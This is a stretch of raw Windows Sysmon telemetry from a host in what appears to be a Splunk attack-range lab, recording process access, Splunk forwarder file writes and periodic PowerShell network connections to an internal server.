14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341960Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.338{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.337{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.337{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035341951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:19.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9433223C4F9EAB636ED15F3F9FE15840,SHA256=3345AF9E53062618E05CC3C2EFD394F49835AB067C98C23C7E5658FAC7C26A25,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341982Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:20.289{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=044CAD60D63EB3C50C43B66A93518130,SHA256=EF1C46D213CDAFEB439F8EDA75A15F2548C054A97D68A60C5F7A74BA8D563230,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341981Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:44.962{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52365-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341983Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:21.037{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AF5A5A3079417B33FE6AB89B766594C,SHA256=145A4BEFBD3540F4C38875A3135CC69F5C95B4847D83A1FDB9B3419B36FD4FC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341985Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:22.987{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341984Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:22.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1558515290CC80E5AF54DEBEFFD6B093,SHA256=6CAA1ABC32326946E7187E08E9D46C7FEBC30983527287F82478C7527D24B8DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341986Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:23.071{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7143FDDCA0830CC0CFF674A78CD14EB,SHA256=9D4B9B32BCA58B0C5C465A9755D63F7E41722DD3D630F02EBE398C7448C2283C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341990Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:49.969{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52367-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035341989Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:49.968{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52366-false10.0.1.12-8089- 23542300x800000000000000035341988Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:24.086{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618BEE066586CCF1E2ACD9A84C36432D,SHA256=C659776E3660F63339A5A2D78C42F167135478BDE42413DDA623F5A0C41865DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341987Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:24.002{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=176553392DC09A974CA63EF4C648346F,SHA256=0316B4C29A8DBA5E8AF37DAEAD5C8AF36D71B8AEDFEED30BF6B98911675498B2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341992Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:50.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52368-false10.0.1.12-8000- 23542300x800000000000000035341991Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:25.116{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8603CE94BC43D8D207C99331760FC4E,SHA256=FF5AB68D9DC5C3B564920C1BD51C5E7F3140328574034D1475B795828D3F2B2E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341993Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:26.118{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93353E729307996941C142B21B8E19FF,SHA256=D7F8126D11654D053EBFB93CDFC728DFABAFD2E139F5846764524A3B305514F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341996Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:27.321{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D863C6B77C1F599867EFD4DFFC64E070,SHA256=F7A8DC39671721490B0EF9DEE74EB2F221568113545DD32448744D171453B23B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341995Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:27.321{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C994720443ABDBE09034C25A4299CA33,SHA256=728943A52192FFF632A314490ECFDCD28F3F6023585FB2DA15BADEDFB3A9DA01,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341994Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:27.138{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A586487FD2D77EBF9EEFD6434E1271E0,SHA256=3B30E93188975FD11ABDB8680D5ED3099BF6B8430D51AA4AF47095BD2B26E5D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341997Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:28.159{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687DC41ED100AF0DCE968EB6E74D6FC0,SHA256=8EC4834446468FD4B309C09064C59D10092CB472CE0273923FCD3D7E1762F9CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342000Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:54.988{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52369-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341999Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:29.175{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8820D0095B0A267C03FEBA0CAC555D80,SHA256=B60EE814CC0F6D3FECB5B9F663CBCCFFBF30EB2C3604BC6F8D2D1E6526170E50,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341998Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:29.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=76AF631BD26784B92F6381A6FF044209,SHA256=DCBE85284A1055B8ED3D76329932D08D7A81AE0BFD064A9006C8E723308632FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342002Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:56.135{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52370-false10.0.1.12-8000- 23542300x800000000000000035342001Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:30.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92997F994EFDB481A06E6C50ACEB978D,SHA256=8A576F7854760D03CC5C9A9E3937BEF4B28A37B152987BC04F04649233E0B9ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342020Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-725B-613B-25B4-03000000C801}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342019Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342018Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342017Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342016Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342015Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-725B-613B-25B4-03000000C801}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342014Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.905{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-725B-613B-25B4-03000000C801}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342013Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:57:31.890{B81B27B7-725B-613B-25B4-03000000C801}5092C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 